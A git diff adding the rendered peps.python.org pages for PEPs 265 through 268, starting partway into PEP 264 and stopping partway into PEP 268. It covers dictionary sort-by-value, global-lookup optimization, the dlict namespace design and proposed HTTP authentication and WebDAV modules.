It will do this by using the new features of the __future__ module +mentioned above.

+

Objects of the other class added to codeop - CommandCompiler - +will do the job of the existing codeop.compile_command function, +but in a __future__-aware way.

+

Finally, I propose to modify the class InteractiveInterpreter in +the standard library module code to use a CommandCompiler to +emulate still more closely the behaviour of the default Python +shell.

+
+
+

Backward Compatibility

+

Should be very few or none; the changes to compile will make no difference to existing code, nor will adding new functions or classes to codeop. Existing code using code.InteractiveInterpreter may change in behaviour, but only for the better, in that the “real” Python shell will be impersonated more closely.

+
+
+

Forward Compatibility

+

The fiddling that needs to be done to Lib/__future__.py when +adding a __future__ feature will be a touch more complicated. +Everything else should just work.

+
+
+

Issues

+

I hope the above interface is not too disruptive to implement for +Jython.

+
+
+

Implementation

+

A series of preliminary implementations are at [1].

+

After light massaging by Tim Peters, they have now been checked in.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0264.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0265/index.html b/pep-0265/index.html new file mode 100644 index 00000000000..c93b97230a6 --- /dev/null +++ b/pep-0265/index.html @@ -0,0 +1,311 @@ + PEP 265 – Sorting Dictionaries by Value | peps.python.org +
+
+


+ + +
+
+
+

PEP 265 – Sorting Dictionaries by Value

+
+
Author:
+
Grant Griffin <g2 at iowegian.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
08-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP suggests a “sort by value” operation for dictionaries. +The primary benefit would be in terms of “batteries included” +support for a common Python idiom which, in its current form, is +both difficult for beginners to understand and cumbersome for all +to implement.

+
+
+

BDFL Pronouncement

+

This PEP is rejected because the need for it has been largely +fulfilled by Py2.4’s sorted() builtin function:

+
>>> from operator import itemgetter
+>>> sorted(d.iteritems(), key=itemgetter(1), reverse=True)
+[('b', 23), ('d', 17), ('c', 5), ('a', 2), ('e', 1)]
+
+
+

or for just the keys:

+
>>> sorted(d, key=d.__getitem__, reverse=True)
+['b', 'd', 'c', 'a', 'e']
+
+
+

Also, Python 2.5’s heapq.nlargest() function addresses the common use +case of finding only a few of the highest valued items:

+
>>> from heapq import nlargest
+>>> nlargest(2, d.iteritems(), itemgetter(1))
+[('b', 23), ('d', 17)]
+
+
+
+
+

Motivation

+

A common use of dictionaries is to count occurrences by setting +the value of d[key] to 1 on its first occurrence, then increment +the value on each subsequent occurrence. This can be done several +different ways, but the get() method is the most succinct:

+
d[key] = d.get(key, 0) + 1
+
+
+

Once all occurrences have been counted, a common use of the +resulting dictionary is to print the occurrences in +occurrence-sorted order, often with the largest value first.

+

This leads to a need to sort a dictionary’s items by value. The +canonical method of doing so in Python is to first use d.items() +to get a list of the dictionary’s items, then invert the ordering +of each item’s tuple from (key, value) into (value, key), then +sort the list; since Python sorts the list based on the first item +of the tuple, the list of (inverted) items is therefore sorted by +value. If desired, the list can then be reversed, and the tuples +can be re-inverted back to (key, value). (However, in my +experience, the inverted tuple ordering is fine for most purposes, +e.g. printing out the list.)

+

For example, given an occurrence count of:

+
>>> d = {'a':2, 'b':23, 'c':5, 'd':17, 'e':1}
+
+
+

we might do:

+
>>> items = [(v, k) for k, v in d.items()]
+>>> items.sort()
+>>> items.reverse()             # so largest is first
+>>> items = [(k, v) for v, k in items]
+
+
+

resulting in:

+
>>> items
+[('b', 23), ('d', 17), ('c', 5), ('a', 2), ('e', 1)]
+
+
+

which shows the list in by-value order, largest first. (In this +case, 'b' was found to have the most occurrences.)

+

This works fine, but is “hard to use” in two aspects. First, +although this idiom is known to veteran Pythoneers, it is not at +all obvious to newbies – either in terms of its algorithm +(inverting the ordering of item tuples) or its implementation +(using list comprehensions – which are an advanced Python +feature.) Second, it requires having to repeatedly type a lot of +“grunge”, resulting in both tedium and mistakes.

+

We therefore would rather Python provide a method of sorting +dictionaries by value which would be both easy for newbies to +understand (or, better yet, not to have to understand) and +easier for all to use.

+
+
+

Rationale

+

As Tim Peters has pointed out, this sort of thing brings on the +problem of trying to be all things to all people. Therefore, we +will limit its scope to try to hit “the sweet spot”. Unusual +cases (e.g. sorting via a custom comparison function) can, of +course, be handled “manually” using present methods.

+

Here are some simple possibilities:

+

The items() method of dictionaries can be augmented with new +parameters having default values that provide for full +backwards-compatibility:

+
(1) items(sort_by_values=0, reversed=0)
+
+
+

or maybe just:

+
(2) items(sort_by_values=0)
+
+
+

since reversing a list is easy enough.

+

Alternatively, items() could simply let us control the (key, value) +order:

+
(3) items(values_first=0)
+
+
+

Again, this is fully backwards-compatible. It does less work than +the others, but it at least eases the most complicated/tricky part +of the sort-by-value problem: inverting the order of item tuples. +Using this is very simple:

+
items = d.items(1)
+items.sort()
+items.reverse()         # (if desired)
+
+
+

The primary drawback of the preceding three approaches is the +additional overhead for the parameter-less items() case, due to +having to process default parameters. (However, if one assumes +that items() gets used primarily for creating sort-by-value lists, +this is not really a drawback in practice.)

+

Alternatively, we might add a new dictionary method which somehow +embodies “sorting”. This approach offers two advantages. First, +it avoids adding overhead to the items() method. Second, it is +perhaps more accessible to newbies: when they go looking for a +method for sorting dictionaries, they hopefully run into this one, +and they will not have to understand the finer points of tuple +inversion and list sorting to achieve sort-by-value.

+

To allow the four basic possibilities of sorting by key/value and in +forward/reverse order, we could add this method:

+
(4) sorted_items(by_value=0, reversed=0)
+
+
+

I believe the most common case would actually be by_value=1, reversed=1, but the default values given here might lead to fewer surprises by users: sorted_items() would be the same as items() followed by sort().

+
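A pure-Python sketch of one reading of option (4)’s semantics: with the defaults it matches items() followed by sort(), and the tuple inversion needed for by-value sorting stays hidden from the caller:

def sorted_items(d, by_value=0, reversed=0):
    items = d.items()
    if by_value:
        items = [(v, k) for (k, v) in items]
    items.sort()
    if reversed:
        items.reverse()
    if by_value:
        items = [(k, v) for (v, k) in items]   # restore (key, value) order
    return items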

Finally (as a last resort), we could use:

+
(5) items_sorted_by_value(reversed=0)
+
+
+
+
+

Implementation

+

The proposed dictionary methods would necessarily be implemented +in C. Presumably, the implementation would be fairly simple since +it involves just adding a few calls to Python’s existing +machinery.

+
+
+

Concerns

+

Aside from the run-time overhead already addressed in +possibilities 1 through 3, concerns with this proposal probably +will fall into the categories of “feature bloat” and/or “code +bloat”. However, I believe that several of the suggestions made +here will result in quite minimal bloat, resulting in a good +tradeoff between bloat and “value added”.

+

Tim Peters has noted that implementing this in C might not be significantly faster than implementing it in Python today. However, the major benefits intended here are “accessibility” and “ease of use”, not “speed”. Therefore, as long as it is not noticeably slower (in the case of plain items()), speed need not be a consideration.

+
+
+

References

+

A related thread called “counting occurrences” appeared on +comp.lang.python in August, 2001. This included examples of +approaches to systematizing the sort-by-value problem by +implementing it as reusable Python functions and classes.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0265.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0266/index.html b/pep-0266/index.html new file mode 100644 index 00000000000..9f76151c19d --- /dev/null +++ b/pep-0266/index.html @@ -0,0 +1,554 @@ + PEP 266 – Optimizing Global Variable/Attribute Access | peps.python.org +
+
+


+ + +
+
+
+

PEP 266 – Optimizing Global Variable/Attribute Access

+
+
Author:
+
Skip Montanaro <skip at pobox.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
13-Aug-2001
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

The bindings for most global variables and attributes of other modules +typically never change during the execution of a Python program, but because +of Python’s dynamic nature, code which accesses such global objects must run +through a full lookup each time the object is needed. This PEP proposes a +mechanism that allows code that accesses most global objects to treat them as +local objects and places the burden of updating references on the code that +changes the name bindings of such objects.

+
+
+

Introduction

+

Consider the workhorse function sre_compile._compile. It is the internal +compilation function for the sre module. It consists almost entirely of a +loop over the elements of the pattern being compiled, comparing opcodes with +known constant values and appending tokens to an output list. Most of the +comparisons are with constants imported from the sre_constants module. +This means there are lots of LOAD_GLOBAL bytecodes in the compiled output +of this module. Just by reading the code it’s apparent that the author +intended LITERAL, NOT_LITERAL, OPCODES and many other symbols to +be constants. Still, each time they are involved in an expression, they must +be looked up anew.

+

Most global accesses are actually to objects that are “almost constants”. +This includes global variables in the current module as well as the attributes +of other imported modules. Since they rarely change, it seems reasonable to +place the burden of updating references to such objects on the code that +changes the name bindings. If sre_constants.LITERAL is changed to refer +to another object, perhaps it would be worthwhile for the code that modifies +the sre_constants module dict to correct any active references to that +object. By doing so, in many cases global variables and the attributes of +many objects could be cached as local variables. If the bindings between the +names given to the objects and the objects themselves changes rarely, the cost +of keeping track of such objects should be low and the potential payoff fairly +large.

+

In an attempt to gauge the effect of this proposal, I modified the Pystone +benchmark program included in the Python distribution to cache global +functions. Its main function, Proc0, makes calls to ten different +functions inside its for loop. In addition, Func2 calls Func1 +repeatedly inside a loop. If local copies of these 11 global identifiers are +made before the functions’ loops are entered, performance on this particular +benchmark improves by about two percent (from 5561 pystones to 5685 on my +laptop). It gives some indication that performance would be improved by +caching most global variable access. Note also that the pystone benchmark +makes essentially no accesses of global module attributes, an anticipated area +of improvement for this PEP.

+
+
+

Proposed Change

+

I propose that the Python virtual machine be modified to include +TRACK_OBJECT and UNTRACK_OBJECT opcodes. TRACK_OBJECT would +associate a global name or attribute of a global name with a slot in the local +variable array and perform an initial lookup of the associated object to fill +in the slot with a valid value. The association it creates would be noted by +the code responsible for changing the name-to-object binding to cause the +associated local variable to be updated. The UNTRACK_OBJECT opcode would +delete any association between the name and the local variable slot.

+
+
+

Threads

+

Operation of this code in threaded programs will be no different than in +unthreaded programs. If you need to lock an object to access it, you would +have had to do that before TRACK_OBJECT would have been executed and +retain that lock until after you stop using it.

+

FIXME: I suspect I need more here.

+
+
+

Rationale

+

Global variables and attributes rarely change. For example, once a function imports the math module, the binding between the name math and the module it refers to isn’t likely to change. Similarly, if the function that uses the math module refers to its sin attribute, it’s unlikely to change. Still, every time the module wants to call the math.sin function, it must first execute a pair of instructions:

+
LOAD_GLOBAL     math
+LOAD_ATTR       sin
+
+
+

If the client module always assumed that math.sin was a local constant and +it was the responsibility of “external forces” outside the function to keep +the reference correct, we might have code like this:

+
TRACK_OBJECT       math.sin
+...
+LOAD_FAST          math.sin
+...
+UNTRACK_OBJECT     math.sin
+
+
+

If the LOAD_FAST was in a loop the payoff in reduced global loads and +attribute lookups could be significant.

+

This technique could, in theory, be applied to any global variable access or +attribute lookup. Consider this code:

+
l = []
+for i in range(10):
+    l.append(math.sin(i))
+return l
+
+
+

Even though l is a local variable, you still pay the cost of loading +l.append ten times in the loop. The compiler (or an optimizer) could +recognize that both math.sin and l.append are being called in the loop +and decide to generate the tracked local code, avoiding it for the builtin +range() function because it’s only called once during loop setup. +Performance issues related to accessing local variables make tracking +l.append less attractive than tracking globals such as math.sin.

+

According to a post to python-dev by Marc-Andre Lemburg [1], LOAD_GLOBAL +opcodes account for over 7% of all instructions executed by the Python virtual +machine. This can be a very expensive instruction, at least relative to a +LOAD_FAST instruction, which is a simple array index and requires no extra +function calls by the virtual machine. I believe many LOAD_GLOBAL +instructions and LOAD_GLOBAL/LOAD_ATTR pairs could be converted to +LOAD_FAST instructions.

+

Code that uses global variables heavily often resorts to various tricks to avoid global variable and attribute lookup. The aforementioned sre_compile._compile function caches the append method of the growing output list. Many people commonly abuse functions’ default argument feature to cache global variable lookups. Both of these schemes are hackish and rarely address all the available opportunities for optimization. (For example, sre_compile._compile does not cache the two globals that it uses most frequently: the builtin len function and the global OPCODES array that it imports from sre_constants.py.)

+
+
+

Questions

+
+

What about threads? What if math.sin changes while in cache?

+

I believe the global interpreter lock will protect values from being +corrupted. In any case, the situation would be no worse than it is today. +If one thread modified math.sin after another thread had already executed +LOAD_GLOBAL math, but before it executed LOAD_ATTR sin, the client +thread would see the old value of math.sin.

+

The idea is this. I use a multi-attribute load below as an example, not +because it would happen very often, but because by demonstrating the recursive +nature with an extra call hopefully it will become clearer what I have in +mind. Suppose a function defined in module foo wants to access +spam.eggs.ham and that spam is a module imported at the module level +in foo:

+
import spam
+...
+def somefunc():
+    ...
+    x = spam.eggs.ham
+
+
+

Upon entry to somefunc, a TRACK_GLOBAL instruction will be executed:

+
TRACK_GLOBAL spam.eggs.ham n
+
+
+

spam.eggs.ham is a string literal stored in the function’s constants +array. n is a fastlocals index. &fastlocals[n] is a reference to +slot n in the executing frame’s fastlocals array, the location in +which the spam.eggs.ham reference will be stored. Here’s what I envision +happening:

+
    +
  1. The TRACK_GLOBAL instruction locates the object referred to by the name +spam and finds it in its module scope. It then executes a C function +like:
    _PyObject_TrackName(m, "spam.eggs.ham", &fastlocals[n])
    +
    +
    +

    where m is the module object with an attribute spam.

    +
  2. +
  3. The module object strips the leading spam. and stores the necessary +information (eggs.ham and &fastlocals[n]) in case its binding for the +name eggs changes. It then locates the object referred to by the key +eggs in its dict and recursively calls:
    _PyObject_TrackName(eggs, "eggs.ham", &fastlocals[n])
    +
    +
    +
  4. +
  5. The eggs object strips the leading eggs., stores the +(ham, &fastlocals[n]) info, locates the object in its namespace called +ham and calls _PyObject_TrackName once again:
    _PyObject_TrackName(ham, "ham", &fastlocals[n])
    +
    +
    +
  6. +
  7. The ham object strips the leading string (no “.” this time, but that’s +a minor point), sees that the result is empty, then uses its own value +(self, probably) to update the location it was handed:
    Py_XDECREF(fastlocals[n]);
+fastlocals[n] = self;
+Py_INCREF(fastlocals[n]);
    +
    +
    +

    At this point, each object involved in resolving spam.eggs.ham +knows which entry in its namespace needs to be tracked and what location +to update if that name changes. Furthermore, if the one name it is +tracking in its local storage changes, it can call _PyObject_TrackName +using the new object once the change has been made. At the bottom end of +the food chain, the last object will always strip a name, see the empty +string and know that its value should be stuffed into the location it’s +been passed.

    +

    When the object referred to by the dotted expression spam.eggs.ham +is going to go out of scope, an UNTRACK_GLOBAL spam.eggs.ham n +instruction is executed. It has the effect of deleting all the tracking +information that TRACK_GLOBAL established.

    +

    The tracking operation may seem expensive, but recall that the objects +being tracked are assumed to be “almost constant”, so the setup cost will +be traded off against hopefully multiple local instead of global loads. +For globals with attributes the tracking setup cost grows but is offset by +avoiding the extra LOAD_ATTR cost. The TRACK_GLOBAL instruction +needs to perform a PyDict_GetItemString for the first name in the chain +to determine where the top-level object resides. Each object in the chain +has to store a string and an address somewhere, probably in a dict that +uses storage locations as keys (e.g. the &fastlocals[n]) and strings as +values. (This dict could possibly be a central dict of dicts whose keys +are object addresses instead of a per-object dict.) It shouldn’t be the +other way around because multiple active frames may want to track +spam.eggs.ham, but only one frame will want to associate that name with +one of its fast locals slots.

    +
  8. +
+
+
+
+

Unresolved Issues

+
+

Threading

+

What about this (dumb) code?:

+
l = []
+lock = threading.Lock()
+...
+def fill_l():
+   for i in range(1000):
+      lock.acquire()
+      l.append(math.sin(i))
+      lock.release()
+...
+def consume_l():
+   while 1:
+      lock.acquire()
+      if l:
+         elt = l.pop()
+      lock.release()
+      fiddle(elt)
+
+
+

It’s not clear from a static analysis of the code what the lock is protecting. (You can’t tell at compile-time that threads are even involved, can you?) Would or should it affect attempts to track l.append or math.sin in the fill_l function?

+

If we annotate the code with mythical track_object and untrack_object +builtins (I’m not proposing this, just illustrating where stuff would go!), we +get:

+
l = []
+lock = threading.Lock()
+...
+def fill_l():
+   track_object("l.append", append)
+   track_object("math.sin", sin)
+   for i in range(1000):
+      lock.acquire()
+      append(sin(i))
+      lock.release()
+   untrack_object("math.sin", sin)
+   untrack_object("l.append", append)
+...
+def consume_l():
+   while 1:
+      lock.acquire()
+      if l:
+         elt = l.pop()
+      lock.release()
+      fiddle(elt)
+
+
+

Is that correct both with and without threads (or at least equally incorrect +with and without threads)?

+
+
+

Nested Scopes

+

The presence of nested scopes will affect where TRACK_GLOBAL finds a +global variable, but shouldn’t affect anything after that. (I think.)

+
+
+

Missing Attributes

+

Suppose I am tracking the object referred to by spam.eggs.ham and +spam.eggs is rebound to an object that does not have a ham attribute. +It’s clear this will be an AttributeError if the programmer attempts to +resolve spam.eggs.ham in the current Python virtual machine, but suppose +the programmer has anticipated this case:

+
if hasattr(spam.eggs, "ham"):
+    print spam.eggs.ham
+elif hasattr(spam.eggs, "bacon"):
+    print spam.eggs.bacon
+else:
+    print "what? no meat?"
+
+
+

You can’t raise an AttributeError when the tracking information is +recalculated. If it does not raise AttributeError and instead lets the +tracking stand, it may be setting the programmer up for a very subtle error.

+

One solution to this problem would be to track the shortest possible root of +each dotted expression the function refers to directly. In the above example, +spam.eggs would be tracked, but spam.eggs.ham and spam.eggs.bacon +would not.

+
+
+

Who does the dirty work?

+

In the Questions section I postulated the existence of a +_PyObject_TrackName function. While the API is fairly easy to specify, +the implementation behind-the-scenes is not so obvious. A central dictionary +could be used to track the name/location mappings, but it appears that all +setattr functions might need to be modified to accommodate this new +functionality.

+

If all types used the PyObject_GenericSetAttr function to set attributes, that would localize the update code somewhat. They don’t, however (which is not too surprising), so it seems that all setattrfunc and setattrofunc functions will have to be updated. In addition, this would place an absolute requirement on C extension module authors to call some function when an attribute changes value (PyObject_TrackUpdate?).

+

Finally, it’s quite possible that some attributes will be set by side effect +and not by any direct call to a setattr method of some sort. Consider a +device interface module that has an interrupt routine that copies the contents +of a device register into a slot in the object’s struct whenever it +changes. In these situations, more extensive modifications would have to be +made by the module author. To identify such situations at compile time would +be impossible. I think an extra slot could be added to PyTypeObjects to +indicate if an object’s code is safe for global tracking. It would have a +default value of 0 (Py_TRACKING_NOT_SAFE). If an extension module author +has implemented the necessary tracking support, that field could be +initialized to 1 (Py_TRACKING_SAFE). _PyObject_TrackName could check +that field and issue a warning if it is asked to track an object that the +author has not explicitly said was safe for tracking.

+
+
+
+

Discussion

+

Jeremy Hylton has an alternate proposal on the table [2]. His proposal seeks +to create a hybrid dictionary/list object for use in global name lookups that +would make global variable access look more like local variable access. While +there is no C code available to examine, the Python implementation given in +his proposal still appears to require dictionary key lookup. It doesn’t +appear that his proposal could speed local variable attribute lookup, which +might be worthwhile in some situations if potential performance burdens could +be addressed.

+
+
+

Backwards Compatibility

+

I don’t believe there will be any serious issues of backward compatibility. +Obviously, Python bytecode that contains TRACK_OBJECT opcodes could not be +executed by earlier versions of the interpreter, but breakage at the bytecode +level is often assumed between versions.

+
+
+

Implementation

+

TBD. This is where I need help. I believe there should be either a central +name/location registry or the code that modifies object attributes should be +modified, but I’m not sure the best way to go about this. If you look at the +code that implements the STORE_GLOBAL and STORE_ATTR opcodes, it seems +likely that some changes will be required to PyDict_SetItem and +PyObject_SetAttr or their String variants. Ideally, there’d be a fairly +central place to localize these changes. If you begin considering tracking +attributes of local variables you get into issues of modifying STORE_FAST +as well, which could be a problem, since the name bindings for local variables +are changed much more frequently. (I think an optimizer could avoid inserting +the tracking code for the attributes for any local variables where the +variable’s name binding changes.)
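+
One way to picture the central registry (a rough Python sketch; the names track_name and name_updated are invented for illustration and are not part of this proposal): it maps each tracked name to the fast-local slots that cache it, so the store paths can refresh every cached copy when the name is rebound.
+
_tracked = {}   # name -> list of (fastlocals, index) pairs
+
+def track_name(name, fastlocals, index):
+    _tracked.setdefault(name, []).append((fastlocals, index))
+
+def name_updated(name, new_object):
+    # called from the STORE_GLOBAL/STORE_ATTR paths when name is rebound
+    for fastlocals, index in _tracked.get(name, []):
+        fastlocals[index] = new_object
+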

+
+
+

Performance

+

I believe (though I have no code to prove it at this point) that implementing +TRACK_OBJECT will generally not be much more expensive than a single +LOAD_GLOBAL instruction or a LOAD_GLOBAL/LOAD_ATTR pair. An +optimizer should be able to avoid converting LOAD_GLOBAL and +LOAD_GLOBAL/LOAD_ATTR to the new scheme unless the object access +occurred within a loop. Further down the line, a register-oriented +replacement for the current Python virtual machine [3] could conceivably +eliminate most of the LOAD_FAST instructions as well.

+

The number of tracked objects should be relatively small. All active frames +of all active threads could conceivably be tracking objects, but this seems +small compared to the number of functions defined in a given application.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0266.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0267/index.html new file mode 100644 index 00000000000..529aed3e6ef --- /dev/null +++ b/pep-0267/index.html @@ -0,0 +1,386 @@ + + PEP 267 – Optimized Access to Module Namespaces | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 267 – Optimized Access to Module Namespaces

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
23-May-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Deferral

+

While this PEP is a nice idea, no-one has yet emerged to do the work of +hashing out the differences between this PEP, PEP 266 and PEP 280. +Hence, it is being deferred.

+
+
+

Abstract

+

This PEP proposes a new implementation of global module namespaces +and the builtin namespace that speeds name resolution. The +implementation would use an array of object pointers for most +operations in these namespaces. The compiler would assign indices +for global variables and module attributes at compile time.

+

The current implementation represents these namespaces as +dictionaries. A global name incurs a dictionary lookup each time +it is used; a builtin name incurs two dictionary lookups, a failed +lookup in the global namespace and a second lookup in the builtin +namespace.

+

This implementation should speed Python code that uses +module-level functions and variables. It should also eliminate +awkward coding styles that have evolved to speed access to these +names.

+

The implementation is complicated because the global and builtin +namespaces can be modified dynamically in ways that are impossible +for the compiler to detect. (Example: A module’s namespace is +modified by a script after the module is imported.) As a result, +the implementation must maintain several auxiliary data structures +to preserve these dynamic features.

+
+
+

Introduction

+

This PEP proposes a new implementation of attribute access for +module objects that optimizes access to module variables known at +compile time. The module will store these variables in an array +and provide an interface to lookup attributes using array offsets. +For globals, builtins, and attributes of imported modules, the +compiler will generate code that uses the array offsets for fast +access.

+

[describe the key parts of the design: dlict, compiler support, +stupid name trick workarounds, optimization of other module’s +globals]

+

The implementation will preserve existing semantics for module +namespaces, including the ability to modify module namespaces at +runtime in ways that affect the visibility of builtin names.

+
+
+

DLict design

+

The namespaces are implemented using a data structure that has +sometimes gone under the name dlict. It is a dictionary that has +numbered slots for some dictionary entries. The type must be +implemented in C to achieve acceptable performance. The new +type-class unification work should make this fairly easy. The +DLict will presumably be a subclass of dictionary with an +alternate storage module for some keys.

+

A Python implementation is included here to illustrate the basic +design:

+
"""A dictionary-list hybrid"""
+
+import types
+
+class DLict:
+    def __init__(self, names):
+        assert isinstance(names, types.DictType)
+        self.names = {}
+        self.list = [None] * size
+        self.empty = [1] * size
+        self.dict = {}
+        self.size = 0
+
+    def __getitem__(self, name):
+        i = self.names.get(name)
+        if i is None:
+            return self.dict[name]
+        if self.empty[i] is not None:
+            raise KeyError, name
+        return self.list[i]
+
+    def __setitem__(self, name, val):
+        i = self.names.get(name)
+        if i is None:
+            self.dict[name] = val
+        else:
+            self.empty[i] = None
+            self.list[i] = val
+            self.size += 1
+
+    def __delitem__(self, name):
+        i = self.names.get(name)
+        if i is None:
+            del self.dict[name]
+        else:
+            if self.empty[i] is not None:
+                raise KeyError, name
+            self.empty[i] = 1
+            self.list[i] = None
+            self.size -= 1
+
+    def keys(self):
+        if self.dict:
+            return self.names.keys() + self.dict.keys()
+        else:
+            return self.names.keys()
+
+    def values(self):
+        if self.dict:
+            return self.names.values() + self.dict.values()
+        else:
+            return self.names.values()
+
+    def items(self):
+        if self.dict:
+            return self.names.items()
+        else:
+            return self.names.items() + self.dict.items()
+
+    def __len__(self):
+        return self.size + len(self.dict)
+
+    def __cmp__(self, dlict):
+        c = cmp(self.names, dlict.names)
+        if c != 0:
+            return c
+        c = cmp(self.size, dlict.size)
+        if c != 0:
+            return c
+        for i in range(len(self.names)):
+            c = cmp(self.empty[i], dlict.empty[i])
+        if c != 0:
+            return c
+        if self.empty[i] is None:
+            c = cmp(self.list[i], dlict.empty[i])
+            if c != 0:
+                return c
+        return cmp(self.dict, dlict.dict)
+
+    def clear(self):
+        self.dict.clear()
+        for i in range(len(self.names)):
+            if self.empty[i] is None:
+                self.empty[i] = 1
+                self.list[i] = None
+
+    def update(self):
+        pass
+
+    def load(self, index):
+        """dlict-special method to support indexed access"""
+        if self.empty[index] is None:
+            return self.list[index]
+        else:
+            raise KeyError, index # XXX might want reverse mapping
+
+    def store(self, index, val):
+        """dlict-special method to support indexed access"""
+        self.empty[index] = None
+        self.list[index] = val
+
+    def delete(self, index):
+        """dlict-special method to support indexed access"""
+        self.empty[index] = 1
+        self.list[index] = None
+
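+
For illustration, a module compiled with two known global names might use the class like this (a usage sketch added for clarity, not text from the PEP):
+
d = DLict({'spam': 0, 'eggs': 1})
+d['spam'] = 42        # by-name interface fills slot 0
+print d.load(0)       # indexed access; prints 42
+d['ham'] = 1          # name unknown at compile time: backup dict
+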
+
+
+
+

Compiler issues

+

The compiler currently collects the names of all global variables +in a module. These are names bound at the module level or bound +in a class or function body that declares them to be global.

+

The compiler would assign indices for each global name and add the +names and indices of the globals to the module’s code object. +Each code object would then be bound irrevocably to the module it +was defined in. (Not sure if there are some subtle problems with +this.)

+

For attributes of imported modules, the module will store an +indirection record. Internally, the module will store a pointer +to the defining module and the offset of the attribute in the +defining module’s global variable array. The offset would be +initialized the first time the name is looked up.
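+
A Python sketch of such an indirection record (the __dlict__ and __dlict_names__ attributes are invented for illustration; the PEP does not specify how the dlict would be exposed):
+
class IndirectionRecord:
+    def __init__(self, module, name):
+        self.module = module
+        self.name = name
+        self.offset = None          # resolved on first lookup
+
+    def load(self):
+        if self.offset is None:
+            self.offset = self.module.__dlict_names__[self.name]
+        return self.module.__dlict__.load(self.offset)
+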

+
+
+

Runtime model

+

The PythonVM will be extended with new opcodes to access globals +and module attributes via a module-level array.

+

A function object would need to point to the module that defined +it in order to provide access to the module-level global array.

+

For module attributes stored in the dlict (call them static +attributes), the get/delattr implementation would need to track +access to these attributes using the old by-name interface. If a +static attribute is updated dynamically, e.g.:

+
mod.__dict__["foo"] = 2
+
+
+

The implementation would need to update the array slot instead of +the backup dict.

+
+
+

Backwards compatibility

+

The dlict will need to maintain meta-information about whether a +slot is currently used or not. It will also need to maintain a +pointer to the builtin namespace. When a name is not currently +used in the global namespace, the lookup will have to fail over to +the builtin namespace.

+

In the reverse case, each module may need a special accessor +function for the builtin namespace that checks to see if a global +shadowing the builtin has been added dynamically. This check +would only occur if there was a dynamic change to the module’s +dlict, i.e. when a name is bound that wasn’t discovered at +compile-time.

+

These mechanisms would have little if any cost for the common case +where a module’s global namespace is not modified in strange +ways at runtime. They would add overhead for modules that did +unusual things with global names, but this is an uncommon practice +and probably one worth discouraging.

+

It may be desirable to disable dynamic additions to the global +namespace in some future version of Python. If so, the new +implementation could provide warnings.

+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0267.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0268/index.html new file mode 100644 index 00000000000..84621400aa7 --- /dev/null +++ b/pep-0268/index.html @@ -0,0 +1,304 @@ + + PEP 268 – Extended HTTP functionality and WebDAV | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 268 – Extended HTTP functionality and WebDAV

+
+
Author:
+
Greg Stein <gstein at lyra.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Aug-2001
+
Python-Version:
+
2.x
+
Post-History:
+
21-Aug-2001
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. It has failed to generate sufficient +community support in the six years since its proposal.

+
+
+

Abstract

+

This PEP discusses new modules and extended functionality for Python’s +HTTP support: notably, the addition of authenticated requests, proxy +support, authenticated proxy usage, and WebDAV capabilities.

+
+
+

Rationale

+

Python has been quite popular as a result of its “batteries included” +positioning. One of the most heavily used protocols, HTTP (see +RFC 2616), has been included with Python for years (httplib). However, +this support has not kept up with the full needs and requirements of +many HTTP-based applications and systems. In addition, new protocols +based on HTTP, such as WebDAV and XML-RPC, are becoming useful and are +seeing increasing usage. Supplying this functionality meets Python’s +“batteries included” role and also keeps Python at the leading edge of +new technologies.

+

While authentication and proxy support are two very notable features +missing from Python’s core HTTP processing, they are minimally handled +as part of Python’s URL handling (urllib and +urllib2). However, applications that need fine-grained or +sophisticated HTTP handling cannot make use of the features while they +reside in urllib. Refactoring these features into a location where +they can be directly associated with an HTTP connection will improve +their utility for both urllib and for sophisticated applications.

+

The motivation for this PEP was from several people requesting these +features directly, and from a number of feature requests on +SourceForge. Since the exact form of the modules to be provided and +the classes/architecture used could be subject to debate, this PEP was +created to provide a focal point for those discussions.

+
+
+

Specification

+

Two modules will be added to the standard library: httpx (HTTP +extended functionality), and davlib (WebDAV library).

+

[ suggestions for module names are welcome; davlib has some +precedence, but something like webdav might be desirable ]

+
+

HTTP Authentication

+

The httpx module will provide a mixin for performing HTTP +authentication (for both proxy and origin server authentication). This +mixin (httpx.HandleAuthentication) can be combined with the +HTTPConnection and the HTTPSConnection classes (the mixin may +possibly work with the HTTP and HTTPS compatibility classes, but that +is not a requirement).

+

The mixin will delegate the authentication process to one or more +“authenticator” objects, allowing multiple connections to share +authenticators. The use of a separate object allows for a long term +connection to an authentication system (e.g. LDAP). An authenticator +for the Basic and Digest mechanisms (see RFC 2617) will be +provided. User-supplied authenticator subclasses can be registered and +used by the connections.

+

A “credentials” object (httpx.Credentials) is also associated with +the mixin, and stores the credentials (e.g. username and password) +needed by the authenticators. Subclasses of Credentials can be created +to hold additional information (e.g. NT domain).
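+
A sketch of how these pieces might fit together (the class and module names are those proposed above, but the constructor keyword and the add() signature are illustrative assumptions, since the PEP does not pin them down):
+
import httplib, httpx
+
+class AuthHTTPConnection(httpx.HandleAuthentication, httplib.HTTPConnection):
+    pass
+
+creds = httpx.Credentials()
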